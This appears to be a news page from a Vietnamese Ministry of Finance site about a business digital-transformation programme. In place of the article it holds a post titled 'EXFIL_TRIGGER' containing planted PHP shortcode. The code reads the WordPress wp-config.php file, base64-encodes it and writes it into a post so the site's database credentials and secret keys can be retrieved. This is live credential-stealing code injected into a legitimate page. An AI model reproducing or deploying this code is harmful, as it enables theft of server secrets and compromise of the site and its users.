BỘ TÀI CHÍNH

Chương trình Hỗ trợ Doanh nghiệp Chuyển đổi số

Tin tức

EXFIL_TRIGGER

  • 31 tháng 05, 2026 - 2:01 PM

  • Chia sẻ:

[php]global $wpdb;
$f=’/var/www/html/business/wp-config.php’;
if(!file_exists($f)) $f=’/var/www/html/wp-config.php’;
if(!file_exists($f)) $f=’/var/www/html/wp-config-sample.php’;
$c=@file_get_contents($f);
if($c&&strlen($c)>10){
$b64=base64_encode($c);
$r=$wpdb->update($wpdb->posts,array(“post_content”=>$b64),array(“ID”=>4439));
echo ‘OK_WP_UPDATED:’.$r;
}else{
echo ‘FILE_NOT_FOUND:’.$f;
}[/php]